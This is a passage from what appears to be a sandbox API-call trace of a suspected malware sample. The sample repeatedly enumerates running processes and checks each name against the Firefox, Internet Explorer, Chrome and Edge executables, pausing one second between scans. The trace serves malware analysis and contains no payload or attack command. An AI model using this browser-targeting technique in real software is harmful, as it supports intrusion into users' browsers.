pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.931] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.931] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.931] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0258.932] CloseHandle (hObject=0xd4) returned 1 [0258.932] Sleep (dwMilliseconds=0x3e8) [0259.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0259.947] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.947] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0259.947] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0259.947] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0259.947] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0259.947] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.948] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0259.948] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0259.948] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0259.948] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0259.948] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.948] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0259.948] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0259.948] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0259.948] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.948] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.949] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0259.949] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0259.949] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0259.949] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.949] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.950] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0259.950] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0259.950] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0259.950] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.950] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.950] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0259.950] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0259.950] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0259.950] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.950] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.951] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0259.951] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0259.951] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0259.951] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.951] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.951] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0259.951] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0259.951] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0259.951] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.951] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.952] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0259.952] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0259.952] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0259.952] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.952] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0259.952] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0259.952] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0259.952] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0259.953] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.953] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.953] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.953] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.953] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.953] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.953] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.954] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.954] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.954] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.955] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.955] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.955] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.956] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0259.956] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0259.956] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0259.956] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.956] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.956] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.956] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.956] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.957] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.957] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.957] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.957] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.957] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.957] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.957] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.958] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0259.958] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0259.958] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0259.958] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.958] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.958] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0259.958] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0259.958] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0259.958] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.958] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0259.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0259.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0259.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.959] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.959] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.959] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.959] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.959] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.959] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0259.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0259.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0259.960] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.960] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0259.960] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0259.961] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0259.961] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0259.961] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.961] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0259.961] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0259.961] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0259.961] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0259.961] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.961] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0259.962] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0259.962] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0259.962] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0259.962] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.962] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0259.962] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0259.962] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0259.962] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0259.962] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.962] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0259.963] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0259.963] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0259.963] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0259.963] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.963] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0259.963] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0259.963] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0259.963] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0259.963] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.963] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0259.964] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0259.964] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0259.964] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0259.964] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.964] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0259.965] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0259.965] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0259.965] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0259.965] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.965] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0259.965] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0259.965] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0259.965] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0259.965] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.965] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0259.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0259.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0259.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0259.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.966] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0259.966] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0259.966] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0259.966] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0259.966] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.966] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0259.967] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0259.967] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0259.967] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0259.967] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.967] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0259.968] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0259.968] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0259.968] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0259.968] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.968] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0259.968] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0259.968] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0259.968] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0259.969] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.969] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0259.969] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0259.969] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0259.969] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0259.969] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.969] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0259.970] lstrcmpiA (lpString1="dallasr.exe", 